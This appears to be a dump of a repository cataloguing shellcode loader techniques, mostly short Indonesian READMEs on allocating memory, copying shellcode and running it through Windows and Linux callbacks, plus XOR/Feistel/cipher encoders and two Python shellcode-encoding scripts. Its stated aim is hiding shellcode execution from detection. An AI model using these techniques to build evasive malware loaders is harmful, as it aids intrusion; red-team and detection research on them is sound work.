--------------------------------------------------------------------------------
/windows/execution/callback/EnumCalendarInfoExEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumCalendarInfoExEx`.
 8 | 
 9 | ```c++
10 | BOOL EnumCalendarInfoExEx (CALINFO_ENUMPROCEXEX pCalInfoEnumProcExEx, LPCWSTR lpLocaleName, CALID Calendar, LPCWSTR lpReserved, CALTYPE CalType, LPARAM lParam);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN EnumCalendarInfoExEx](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfoexex)


--------------------------------------------------------------------------------
/linux/execution/thread/clone/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode as a thread.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan syscall `clone`. Syscall `clone` digunakan untuk membuat process baru (oleh `fork`) ataupun thread baru (oleh `pthread_create`).
 8 | 
 9 | ```c++
10 | #include <sched.h>
11 | 
12 | typedef int (*callback_t)(void);
13 | 
14 | int clone(callback_t fn, void * stack, int flags, void * arg);
15 | ```
16 | 
17 | ### Reference
18 | 
19 | - [Man 2 clone](https://man7.org/linux/man-pages/man2/clone.2.html)


--------------------------------------------------------------------------------
/windows/execution/thread/SHCreateThreadWithHandle/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `SHCreateThreadWithHandle`.
 8 | 
 9 | ```c++
10 | BOOL SHCreateThreadWithHandle (LPTHREAD_START_ROUTINE pfnThreadProc, void * pData, SHCT_FLAGS flags, LPTHREAD_START_ROUTINE pfnCallback, HANDLE * pHandle);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN SHCreateThreadWithHandle](https://docs.microsoft.com/en-us/windows/win32/api/shlwapi/nf-shlwapi-shcreatethreadwithhandle)


--------------------------------------------------------------------------------
/windows/writing/encryption/block/lea/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Shellcode encryptoin.
 4 | 
 5 | ### Overview
 6 | 
 7 | Enkripsi `LEA` dengan implementasi pribadi tanpa menggunakan API pihak ketiga.
 8 | 
 9 | ### References
10 | 
11 | - [Reversing.ID LEA Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/LEA)
12 | - [Reversing.ID LEA Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/LEA/code.c)
13 | - [Wikipedia LEA](https://en.wikipedia.org/wiki/LEA_(cipher))


--------------------------------------------------------------------------------
/windows/allocation/CoTaskMemAlloc/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Allocate memory for executing shellcode later.
 4 | 
 5 | ### Overview
 6 | 
 7 | Alokasi menggunakan `CoTaskMemAlloc`.
 8 | 
 9 | ```c++
10 | LPVOID CoTaskMemAlloc (SIZE_T cb);
11 | 
12 | void CoTaskMemFree (LPVOID pv);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN CoTaskMemAlloc](https://docs.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-cotaskmemalloc)
18 | - [MSDN CoTaskMemFree](https://docs.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-cotaskmemfree)


--------------------------------------------------------------------------------
/windows/execution/callback/VerifierEnumerateResource/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `VerifierEnumerateResource`.
 8 | 
 9 | ```c++
10 | ULONG VerifierEnumerateResource (HANDLE Process, ULONG Flags, ULONG ResourceType, AVRF_RESOURCE_ENUMERATE_CALLBACK ResourceCallback, PVOID EnumerationContext);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN VerifierEnumerateResource](https://docs.microsoft.com/en-us/windows/win32/api/avrfsdk/nf-avrfsdk-verifierenumerateresource)


--------------------------------------------------------------------------------
/windows/writing/custom/xor-multikey/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Transform the shellcode with custom algorithm.
 4 | 
 5 | ### Overview
 6 | 
 7 | Shellcode dienkripsi menggunakan XOR sederhana. Shellcode akan dibagi menjadi beberapa N blok berisi maksimal S-byte. Setiap blok akan didahului dengan sebuah key yang digunakan untuk mengenkripsi blok tersebut.
 8 | 
 9 | Shellcode yang tersimpan memiliki format sebagai berikut:
10 | 
11 | ```
12 | [N] [S] [[Key-1] [Encoded Shellcode-1]] [[Key-2] [Encoded Shellcode-2]] ... [[Key-N] [Encoded Shellcode-N]].
13 | ```


--------------------------------------------------------------------------------
/windows/writing/encryption/block/khazad/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Shellcode encryptoin.
 4 | 
 5 | ### Overview
 6 | 
 7 | Enkripsi `KHAZAD` dengan implementasi pribadi tanpa menggunakan API pihak ketiga.
 8 | 
 9 | ### References
10 | 
11 | - [Reversing.ID KHAZAD Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/KHAZAD)
12 | - [Reversing.ID KHAZAD Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/KHAZAD/code.c)
13 | - [Wikipedia KHAZAD](https://en.wikipedia.org/wiki/KHAZAD)


--------------------------------------------------------------------------------
/windows/writing/encryption/block/treyfer/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Shellcode encryptoin.
 4 | 
 5 | ### Overview
 6 | 
 7 | Enkripsi `Treyfer` dengan implementasi pribadi tanpa menggunakan API pihak ketiga.
 8 | 
 9 | ### References
10 | 
11 | - [Reversing.ID Treyfer Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Treyfer)
12 | - [Reversing.ID Treyfer Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/Treyfer/code.c)
13 | - [Wikipedia Treyfer](https://en.wikipedia.org/wiki/Treyfer)


--------------------------------------------------------------------------------
/windows/writing/encryption/block/3-way/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Shellcode encryption.
 4 | 
 5 | ### Overview
 6 | 
 7 | Enkripsi `3-Way` dengan implementasi pribadi tanpa menggunakan API pihak ketiga.
 8 | 
 9 | `3-Way` merupakan block cipher yang bekerja berdasarkan kalkulasi 3 integer 32-bit sehingga ukuran block dan panjang key dibatasi pada 96-bit.
10 | 
11 | ### References
12 | 
13 | - [Reversing.ID 3-Way Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/3-Way/code.c)
14 | - [Wikipedia 3-Way](https://en.wikipedia.org/wiki/3-Way)


--------------------------------------------------------------------------------
/windows/writing/encryption/block/khufu/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Shellcode encryptoin.
 4 | 
 5 | ### Overview
 6 | 
 7 | Enkripsi `Khufu` dengan implementasi pribadi tanpa menggunakan API pihak ketiga.
 8 | 
 9 | ### References
10 | 
11 | - [Reversing.ID Khufu Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Khufu)
12 | - [Reversing.ID Khusu Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/Khufu/code.c)
13 | - [Wikipedia Khufu (and Khafre)](https://en.wikipedia.org/wiki/Khufu_and_Khafre)


--------------------------------------------------------------------------------
/windows/writing/encryption/block/lucifer/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Shellcode encryptoin.
 4 | 
 5 | ### Overview
 6 | 
 7 | Enkripsi `Lucifer` dengan implementasi pribadi tanpa menggunakan API pihak ketiga.
 8 | 
 9 | ### References
10 | 
11 | - [Reversing.ID Lucifer Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Lucifer)
12 | - [Reversing.ID Lucifer Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/Lucifer/code.c)
13 | - [Wikipedia Lucifer](https://en.wikipedia.org/wiki/Lucifer_(cipher))


--------------------------------------------------------------------------------
/windows/execution/callback/waveInOpen/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `waveInOpen`.
 8 | 
 9 | ```c++
10 | MMRESULT waveInOpen(LPHWAVEIN phwi, UINT uDeviceID, LPCWAVEFORMATEX pwfx, DWORD_PTR dwCallback, DWORD_PTR dwInstance, DWORD fdwOpen);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN waveInOpen](https://learn.microsoft.com/en-us/windows/win32/api/mmeapi/nf-mmeapi-waveinopen)
16 | - [MSDN structure WAVEFORMATEX](https://learn.microsoft.com/en-us/previous-versions/dd757713(v=vs.85))


--------------------------------------------------------------------------------
/windows/execution/callback/waveOutOpen/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `waveOutOpen`.
 8 | 
 9 | ```c++
10 | MMRESULT waveOutOpen(LPHWAVEOUT phwo, UINT uDeviceID, LPCWAVEFORMATEX pwfx, DWORD_PTR dwCallback, DWORD_PTR dwInstance, DWORD fdwOpen);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN waveOutOpen](https://learn.microsoft.com/en-us/windows/win32/api/mmeapi/nf-mmeapi-waveoutopen)
16 | - [MSDN structure WAVEFORMATEX](https://learn.microsoft.com/en-us/previous-versions/dd757713(v=vs.85))


--------------------------------------------------------------------------------
/windows/execution/callback/NotifyTeredoPortChange/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `NotifyTeredoPortChange`.
 8 | 
 9 | ```c++
10 | IPHLPAPI_DLL_LINKAGE _NETIOAPI_SUCCESS_ NETIOAPI_API
11 | NotifyTeredoPortChange ( PTEREDO_PORT_CHANGE_CALLBACK Callback, PVOID CallerContext, BOOLEAN InitialNotification, HANDLE *NotificationHandle);
12 | ```
13 | 
14 | ### Reference 
15 | 
16 | - [MSDN NotifyTeredoPortChange](https://docs.microsoft.com/en-us/windows/win32/api/netioapi/nf-netioapi-notifyteredoportchange)


--------------------------------------------------------------------------------
/windows/writing/encryption/block/des/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Shellcode encryptoin.
 4 | 
 5 | ### Overview
 6 | 
 7 | Enkripsi `DES (Data Encryptoin Standard)` dengan implementasi pribadi tanpa menggunakan API pihak ketiga.
 8 | 
 9 | ### References
10 | 
11 | - [Reversing.ID DES Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/DES)
12 | - [Reversing.ID DES Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/DES/code.c)
13 | - [Wikipedia DES](https://en.wikipedia.org/wiki/Data_Encryption_Standard)
14 | 


--------------------------------------------------------------------------------
/windows/execution/callback/NotifyRouteChange2/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `NotifyRouteChange2`.
 8 | 
 9 | ```c++
10 | IPHLPAPI_DLL_LINKAGE _NETIOAPI_SUCCESS_ NETIOAPI_API 
11 | NotifyRouteChange2 (ADDRESS_FAMILY AddressFamily, PIPFORWARD_CHANGE_CALLBACK Callback, PVOID CallerContext, BOOLEAN InitialNotification, HANDLE NotificationHandle);
12 | ```
13 | 
14 | ### Reference 
15 | 
16 | - [MSDN NotifyRouteChange2](https://docs.microsoft.com/en-us/windows/win32/api/netioapi/nf-netioapi-notifyroutechange2)


--------------------------------------------------------------------------------
/windows/writing/custom/xor-chain/c++/generate.py:
--------------------------------------------------------------------------------
 1 | # read shellcode from `shellcode.bin` and
 2 | # generate the encoded shellcode 
 3 | 
 4 | import random 
 5 | 
 6 | with open("shellcode.bin", "rb") as f:
 7 |     shcode = f.read()
 8 | shlen = len(shcode)
 9 | 
10 | key = random.randrange(1, 255)
11 | 
12 | # encode shellcode
13 | enc_shcode = [key]
14 | 
15 | idx = 0
16 | while idx < shlen:
17 |     enc_shcode.append(shcode[idx] ^ enc_shcode[idx])
18 |     idx += 1
19 | 
20 | # print as C-array
21 | print("{ ", end='')
22 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
23 | print(" }")


--------------------------------------------------------------------------------
/windows/allocation/GlobalAlloc-GPTR/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Allocate memory for executing shellcode later.
 4 | 
 5 | ### Overview
 6 | 
 7 | Alokasi menggunakan `GlobalAlloc` dan dapatkan pointer ke area yang telah dialokasikan.
 8 | 
 9 | ```c++
10 | HGLOBAL GlobalAlloc (UINT uFlags, SIZE_T dwBytes);
11 | 
12 | HGLOBAL GlobalFree (HGLOBAL hMem);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN GlobalAlloc](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalalloc)
18 | - [MSDN GlobalFree](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalfree)


--------------------------------------------------------------------------------
/windows/writing/copy/NtWriteVirtualMemory/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Writing shellcode to allocated memory.
 4 | 
 5 | ### Overview
 6 | 
 7 | Penyalinan shellcode menggunakan `NtWriteVirtualMemory`.
 8 | 
 9 | ```c++
10 | NTSTATUS NtWriteVirtualMemory (HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten);
11 | ```
12 | 
13 | ### Reference
14 | 
15 | - [NTInternals NtWriteVirtualMemory](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtWriteVirtualMemory.html)


--------------------------------------------------------------------------------
/windows/writing/custom/feistel/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Transform the shellcode with custom algorithm.
 4 | 
 5 | ### Overview
 6 | 
 7 | Menggunakan prinsip `Feistel Network` untuk mengenkripsi shellcode. Sebuah key disimpan sebagai byte pertama dan digunakan berulang untuk setiap operasi pada Feistel.
 8 | 
 9 | Shellcode yang tersimpan memiliki format `[Key] [Encoded Shellcode]`.
10 | 
11 | Penerapan Feistel Network dilakukan terhadap setiap pasang byte. Ambil 2 byte yakni L dan R. Pada setiap Feistel, lakukan perhitungan:
12 | 
13 | ```
14 | L[i + 1] = R[i]
15 | R[i + 1] = L[i] xor Key
16 | ```


--------------------------------------------------------------------------------
/windows/execution/callback/PrintDlg/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `PrintDlg`.
 8 | 
 9 | ```c++
10 | BOOL PrintDlg (LPPRINTDLG lppd);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN PrintDlg](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms646940(v=vs.85))
16 | - [MSDN structure PRINTDLGA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-printdlga)
17 | - [MSDN structure PRINTDLGW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-printdlgW)


--------------------------------------------------------------------------------
/windows/permission/NtProtectVirtualMemory/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Change the memory protection of virtual address space.
 4 | 
 5 | ### Overview
 6 | 
 7 | Ubah permission dengan `NtProtectVirtualMemory`.
 8 | 
 9 | ```c++
10 | NTSTATUS NtProtectVirtualMemory (HANDLE ProcessHandle, PVOID * BaseAddress, PULONG NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [NTInternals NtProtectVirtualMemory](http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/Memory%20Management/Virtual%20Memory/NtProtectVirtualMemory.html)
16 | 


--------------------------------------------------------------------------------
/windows/writing/conversion/README.md:
--------------------------------------------------------------------------------
1 | # Shellcode Loader
2 | 
3 | ### Overview
4 | 
5 | Melakukan penyalahgunaan windows API untuk menyalin shellcode.
6 | 
7 | Fungsi yang termasuk ke dalam kategori ini adalah fungsi yang melakukan konversi dari satu format ke format lain (misal, UTF-8 ke UNICODE). Umumnya fungsi memiliki argumen berupa input dan output buffer.
8 | 
9 | Shellcode yang akan diproses oleh fungsi-fungsi ini haruslah disimpan dalam format yang telah ditentukan. Dengan demikian, setiap fungsi mungkin memerlukan generator untuk mengubah (konversi) shellcode menjadi bentuk yang dapat diterima sebagai input fungsi.


--------------------------------------------------------------------------------
/linux/execution/callback/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | ### Overview
 4 | 
 5 | Melakukan penyalahgunaan POSIX API, standard library, framework, dsb untuk mengeksekusi shellcode sebagai callback.
 6 | 
 7 | Fungsi yang dapat disalahgunakan pada POSIX lebih sedikit daripada Windows API.
 8 | 
 9 | Sebagian API menerima callback yang akan dijalankan untuk menangani objek atau memproses hasil operasi. Dengan menjalankan shellcode sebagai callback, kode menjadi lebih tersamarkan karena pemanggilan shellcode menjadi implisit.
10 | 
11 | Umumnya callback akan berjalan pada thread yang sama dengan thread yang memanggil fungsi.


--------------------------------------------------------------------------------
/windows/writing/encryption/block/clefia/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader 
 2 | 
 3 | Shellcode encryption
 4 | 
 5 | ### Overview
 6 | 
 7 | Enkripsi `CLEFIA` dengan implementasi pribadi tanpa menggunakan API pihak ketiga.
 8 | 
 9 | `CLEFIA` memiliki beberapa opsi ukuran key, namun dalam contoh implementasi akan digunakan ukuran key 128-bit.
10 | 
11 | ### References
12 | 
13 | - [Reversing.ID CLEFIA Reference](https://github.com/ReversingID/Crypto-Reference/blob/master/References/Modern/Block-Cipher/CLEFIA)
14 | - [Reversing.ID CLEFIA Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/CLEFIA/code.c)


--------------------------------------------------------------------------------
/windows/writing/encryption/block/mars/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Shellcode encryption
 4 | 
 5 | ### Overview
 6 | 
 7 | Enkripsi `MARS` dengan implementasi pribadi tanpa menggunakan API pihak ketiga.
 8 | 
 9 | `MARS` memiliki beberapa opsi ukuran key, namun dalam contoh implementasi akan digunakan ukuran key 128-bit.
10 | 
11 | ### References
12 | 
13 | - [Reversing.ID MARS Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/MARS/code.c)
14 | - [Reversing.ID MARS Reference](https://github.com/ReversingID/Crypto-Reference/blob/master/References/Modern/Block-Cipher/MARS)
15 | 
16 | 


--------------------------------------------------------------------------------
/windows/execution/exception/SetUnhandledExceptionFilter/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing exception to run the shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode melalui exception yang telah didaftarkan melalui `SetUnhandledExceptionFilter` dan dipicu dengan sembarang exception.
 8 | 
 9 | ```c++
10 | LPTOP_LEVEL_EXCEPTION_FILTER SetUnhandledExceptionFilter (LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter);
11 | ```
12 | 
13 | ### Reference
14 | 
15 | - [MSDN SetUnhandledExceptionFilter](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-setunhandledexceptionfilter)


--------------------------------------------------------------------------------
/windows/execution/fiber/CreateFiber/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode as a fiber.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CreateFiber`.
 8 | 
 9 | ```c++
10 | LPVOID CreateFiber(SIZE_T dwStackSize, LPFIBER_START_ROUTINE lpStartAddress, LPVOID lpParameter);
11 | 
12 | LPVOID ConvertThreadToFiber(LPVOID lpParameter);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN CreateFiber](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfiber)
18 | - [MSDN ConvertThreadToFiber](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-convertthreadtofiber)


--------------------------------------------------------------------------------
/windows/execution/callback/ChooseFont/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `ChooseFont`.
 8 | 
 9 | ```c++
10 | BOOL ChooseFont (LPCHOOSEFONT lpcf);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN ChooseFont](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms646914(v=vs.85))
16 | - [MSDN structure CHOOSEFONTA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-choosefonta)
17 | - [MSDN structure CHOOSEFONTW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-choosefontW)


--------------------------------------------------------------------------------
/linux/execution/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | ### Overview
 4 | 
 5 | Tahap `execution` adalah tahap menjalankan shellcode, baik secara langsung maupun tak langsung.
 6 | 
 7 | Teknik eksekusi dapat dibagi menjadi beberapa kategori berdasarkan karakteristik eksekusi:
 8 | 
 9 | - callback: menyalahgunakan API untuk memanggil shellcode sebagai callback.
10 | - event: memanfaatkan trigger event
11 | - exception: menyalahgunakan sistem exception handling.
12 | - fiber: eksekusi shellcode sebagai fiber baru
13 | - [invoke](invoke): eksekusi shellcode secara langsung tanpa API.
14 | - thread: eksekusi shellcode sebagai thread baru
15 | 


--------------------------------------------------------------------------------
/linux/execution/callback/ftw/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `ftw` (glibc).
 8 | 
 9 | Fungsi `ftw` adalah fungsi POSIX yang digunakan untuk menelusuri file yang ada pada sebuah direktori. Callback akan dipanggil untuk setiap file yang ditemukan. 
10 | 
11 | ```c++
12 | #include <ftw.h>
13 | 
14 | typedef int (*callback_t)(const char *, const struct stat *, int);
15 | 
16 | int ftw(const char * dirpath, callback_t callback, int openfd);
17 | ```
18 | 
19 | ### Reference
20 | 
21 | - [Man 3](https://man7.org/linux/man-pages/man3/ftw.3.html)


--------------------------------------------------------------------------------
/linux/execution/event/signal/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode by raising signal.
 4 | 
 5 | ### Overview
 6 | 
 7 | Daftarkan shellcode ke sebuah signal tertentu dengan `signal` dan eksekusi dengan memicu signal yang sesuai.
 8 | 
 9 | Gunakan signal yang umum terjadi seperti: SIGUSR1, SIGUSR2, SIGCHLD. Hindari memicu signal mencurigakan seperti SIGSEGV, SIGILL, dsb.
10 | 
11 | ```c++
12 | #include <signal.h>
13 | 
14 | typedef void (*callback_t)(int);
15 | 
16 | callback_t signal(int signum, callback_t handler);
17 | ```
18 | 
19 | ### Reference
20 | 
21 | - [Man 2](https://man7.org/linux/man-pages/man2/signal.2.html)


--------------------------------------------------------------------------------
/windows/execution/callback/CryptEnumKeyIdentifierProperties/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CryptEnumKeyIdentifierProperties`.
 8 | 
 9 | ```c++
10 | BOOL CryptEnumKeyIdentifierProperties (const CRYPT_HASH_BLOB *pKeyIdentifier, DWORD dwPropId, DWORD dwFlags, LPCWSTR pwszComputerName, void *pvReserved, void *pvArg, PFN_CRYPT_ENUM_KEYID_PROP pfnEnum);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN CryptEnumKeyIdentifierProperties](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptenumkeyidentifierproperties)


--------------------------------------------------------------------------------
/windows/writing/custom/xor-singlekey-ctr/c++/generate.py:
--------------------------------------------------------------------------------
 1 | # read shellcode from `shellcode.bin` and 
 2 | # generate the encoded shellcode
 3 | 
 4 | import random
 5 | 
 6 | with open("shellcode.bin", "rb") as f:
 7 |     shcode = f.read()
 8 | 
 9 | # generate single byte key
10 | key = random.randrange(1, 255)
11 | 
12 | # xor-encrypt
13 | enc_shcode = [key] 
14 | 
15 | for c in shcode:
16 |     enc_shcode.append(c ^ key)
17 |     key = (key + 1) & 0xFF
18 | 
19 | # print as C-array
20 | print("{ ", end='')
21 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
22 | print(" }")
23 | 
24 | print(f"Length: {len(enc_shcode)}")


--------------------------------------------------------------------------------
/windows/execution/callback/EnumDesktops/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumDesktops`.
 8 | 
 9 | ```c++
10 | BOOL EnumDesktopsA (HWINSTA hwinsta, DESKTOPENUMPROCA lpEnumFunc, LPARAM lParam);
11 | 
12 | BOOL EnumDesktopsW (HWINSTA hwinsta, DESKTOPENUMPROCW lpEnumFunc, LPARAM lParam);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN EnumDesktopsA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumdesktopsa)
18 | - [MSDN EnumDesktopsW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumdesktopsw)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumPageFiles/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumPageFiles`.
 8 | 
 9 | ```c++
10 | BOOL EnumPageFilesA (PENUM_PAGE_FILE_CALLBACKA pCallBackRoutine, LPVOID pContext);
11 | 
12 | BOOL EnumPageFilesW (PENUM_PAGE_FILE_CALLBACKW pCallBackRoutine, LPVOID pContext);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN EnumPageFilesA](https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumpagefilesa)
18 | - [MSDN EnumPageFilesW](https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumpagefilesw)


--------------------------------------------------------------------------------
/windows/execution/callback/SHBrowseForFolder/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `SHBrowseForFolder`.
 8 | 
 9 | ```c++
10 | PIDLIST_ABSOLUTE SHBrowseForFolderA (LPBROWSEINFOA lpbi);
11 | 
12 | PIDLIST_ABSOLUTE SHBrowseForFolderW (LPBROWSEINFOA lpbi);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN SHBrowseForFolderA](https://docs.microsoft.com/en-us/windows/win32/api/shlobj_core/nf-shlobj_core-shbrowseforfoldera)
18 | - [MSDN SHBrowseForFolderW](https://docs.microsoft.com/en-us/windows/win32/api/shlobj_core/nf-shlobj_core-shbrowseforfolderw)


--------------------------------------------------------------------------------
/windows/execution/callback/ChooseColor/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `ChooseColor`.
 8 | 
 9 | ```c++
10 | BOOL ChooseColor (LPCHOOSECOLOR lpcc);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN ChooseColor](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms646912(v=vs.85))
16 | - [MSDN structure CHOOSECOLORA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-choosecolora-r1)
17 | - [MSDN structure CHOOSECOLORW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-choosecolorw-r1)


--------------------------------------------------------------------------------
/windows/execution/callback/PageSetupDlg/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `PageSetupDlg`.
 8 | 
 9 | ```c++
10 | BOOL PageSetupDlg (LPPAGESETUPDLG lpcf);
11 | ```
12 | 
13 | ### Reference 
